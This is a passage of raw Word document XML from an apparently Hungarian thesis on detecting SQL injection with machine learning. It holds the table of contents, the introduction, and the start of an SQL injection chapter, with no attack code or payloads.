            </w:tabs>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71471975" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>2.2.5.</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Random Forest</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471975 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71508199" w14:textId="3B60B94C" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">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1471976" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>2.3.</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Confusion Matrix</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471976 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3888C8B0" w14:textId="1B7D6C12" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">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1471977" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PROGRAM FELÉPÍTÉSE</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471977 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7287D662" w14:textId="7E12E1B0" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81" w:rsidP="00AA5B4A">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1471978" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
              </w:rPr>
              <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471978 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6038749F" w14:textId="1A005D50" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81"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79" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Irodalomjegyzék</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471979 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70DEDDE3" w14:textId="32F9E8F7" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81"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80" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Nyilatkozat</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471980 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30F33D69" w14:textId="7F17A008" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81"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81" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Köszönetnyilvánítás</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471981 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E87A701" w14:textId="22AC6B33" w:rsidR="00AA5B4A" w:rsidRDefault="00C45D81"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82" w:history="1">
            <w:r w:rsidR="00AA5B4A" w:rsidRPr="00713654">
              <w:rPr>
                <w:rStyle w:val="Hiperhivatkozs"/>
                <w:noProof/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <w:t>Mellékletek</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71471982 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00654DB1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="00AA5B4A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27AF0456" w14:textId="38C86D71" w:rsidR="00D1205B" w:rsidRPr="00D47FAE" w:rsidRDefault="00B55F7D" w:rsidP="00AA5B4A">
          <w:pPr>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00D47FAE">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5155CAB8" w14:textId="77777777" w:rsidR="00D1205B" w:rsidRPr="00D47FAE" w:rsidRDefault="00D1205B" w:rsidP="00A62937">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73651016" w14:textId="77777777" w:rsidR="004E5EFD" w:rsidRPr="00D47FAE" w:rsidRDefault="004E5EFD" w:rsidP="004E5EFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0727118F" w14:textId="1010B574" w:rsidR="004E5EFD" w:rsidRPr="00D47FAE" w:rsidRDefault="004E5EFD" w:rsidP="004E5EFD">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc71471961"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>BEVEZETÉS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="00D94E47" w14:textId="6C0DE41A" w:rsidR="004E5EFD" w:rsidRPr="00D47FAE" w:rsidRDefault="004E5EFD" w:rsidP="004E5EFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54EDD3DC" w14:textId="22F58416" w:rsidR="00D46315" w:rsidRPr="00D47FAE" w:rsidRDefault="00C168F7" w:rsidP="003B13F6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="0011031D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> mai </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>világ</w:t>
      </w:r>
      <w:r w:rsidR="0011031D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ban, </w:t>
      </w:r>
      <w:r w:rsidR="00D65A8C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00FB78EB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z informatika világában, a digitalizálás </w:t>
      </w:r>
      <w:r w:rsidR="0045001A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>visszafordíthatatlan</w:t>
      </w:r>
      <w:r w:rsidR="00094371" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, i</w:t>
      </w:r>
      <w:r w:rsidR="0045001A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">lletve </w:t>
      </w:r>
      <w:r w:rsidR="007174F5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nem okszerű</w:t>
      </w:r>
      <w:r w:rsidR="00CE645D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009524D0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Az informatika meglehetősen gyors fejlődése miatt, egy generáció már születésétől kezdve természetesnek vélheti az internethasználatot. </w:t>
      </w:r>
      <w:r w:rsidR="00CE645D" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A társadalom</w:t>
      </w:r>
      <w:r w:rsidR="006B1E64" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> kiélvezi az összes kényelmi funkcióját</w:t>
      </w:r>
      <w:r w:rsidR="007E2AB8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, lebegnek a felszínen, a boldog tudatlanságban, az adataik</w:t>
      </w:r>
      <w:r w:rsidR="00341A8E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E2AB8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>pedig</w:t>
      </w:r>
      <w:r w:rsidR="00120985" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00341A8E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>másod</w:t>
      </w:r>
      <w:r w:rsidR="00120985" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">percről </w:t>
      </w:r>
      <w:r w:rsidR="00341A8E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>másod</w:t>
      </w:r>
      <w:r w:rsidR="00120985" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">percre </w:t>
      </w:r>
      <w:r w:rsidR="007E2AB8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>szivárognak</w:t>
      </w:r>
      <w:r w:rsidR="00C856E0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> le, a felszín alá.</w:t>
      </w:r>
      <w:r w:rsidR="00796271" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Az információk megtartása és biztonsága ezáltal nyert a tudományágában külön területet</w:t>
      </w:r>
      <w:r w:rsidR="000C28F3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>. Mivel értékesebbek lettek, mint a pénz maga.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8FA10" w14:textId="09A7B479" w:rsidR="006F39EF" w:rsidRPr="00D47FAE" w:rsidRDefault="006F39EF" w:rsidP="006F39EF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Információbiztonságra szakosodó programtervező informatikusként állítom, hogy a szoftverfejlesztés nem minden. A bemeneti mezőket nem elég implementálni, meg is kell védeni őket. Ehhez pedig már több módszer van, annál is több példával. A programom mesterséges intelligencia segítségével ezeknek egy elenyésző részét használja fel a tanuláshoz és annak hasznosításához lehetőséget adva ezzel a fejlesztőknek arra, hogy biztonságos programkódot helyezzenek a „használók” elé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734051C7" w14:textId="75ACEDB3" w:rsidR="00186E98" w:rsidRPr="00D47FAE" w:rsidRDefault="00186E98" w:rsidP="00B82D1C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A témaválasztásom egyszerű célja, hogy egy olyan kezdetleges rendszert készítsek, amely lehetőséget ad megvédi azt, ami a pénznél is drágább</w:t>
      </w:r>
      <w:r w:rsidR="009C3B17" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D8199C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bár az injektálás csak egy </w:t>
      </w:r>
      <w:r w:rsidR="00D63DCE" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>része a biztonsági kockázatoknak, ám a legfenyegetőbb</w:t>
      </w:r>
      <w:r w:rsidR="00F25CB7" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007B7D1A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> A dolgozatban </w:t>
      </w:r>
      <w:r w:rsidR="00010B73" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ki fogom fejteni</w:t>
      </w:r>
      <w:r w:rsidR="00E7788E" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> többek között</w:t>
      </w:r>
      <w:r w:rsidR="00D43FAB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00556B24" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ezt a fajta sérülékenységet</w:t>
      </w:r>
      <w:r w:rsidR="00424A7F" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, a tanulási módszereket és a kettő ötvözetét egy programon keresztül, amely kimutatja a biztonságtechnikai fenyegetettséget</w:t>
      </w:r>
      <w:r w:rsidR="00032A26" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az SQL injection irányából</w:t>
      </w:r>
      <w:r w:rsidR="00424A7F" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB938B" w14:textId="3666DB3D" w:rsidR="004E5EFD" w:rsidRPr="00D47FAE" w:rsidRDefault="004E5EFD" w:rsidP="005C0FA0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="054C79ED" w14:textId="77777777" w:rsidR="001761E3" w:rsidRPr="00D47FAE" w:rsidRDefault="001761E3" w:rsidP="001761E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4401F531" w14:textId="78E76CB3" w:rsidR="007761BD" w:rsidRPr="00D47FAE" w:rsidRDefault="00E40924" w:rsidP="00FB5801">
      <w:pPr>
        <w:pStyle w:val="Stlus1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc71471962"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:t>SQL INJECTION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2C8B7D40" w14:textId="77777777" w:rsidR="00864897" w:rsidRPr="00D47FAE" w:rsidRDefault="00864897" w:rsidP="00FB5801">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E3AEA3C" w14:textId="0D529C40" w:rsidR="00A96063" w:rsidRPr="00D47FAE" w:rsidRDefault="00234D27" w:rsidP="00C2305D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A téma</w:t>
      </w:r>
      <w:r w:rsidR="001E105F" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>megnevezés</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
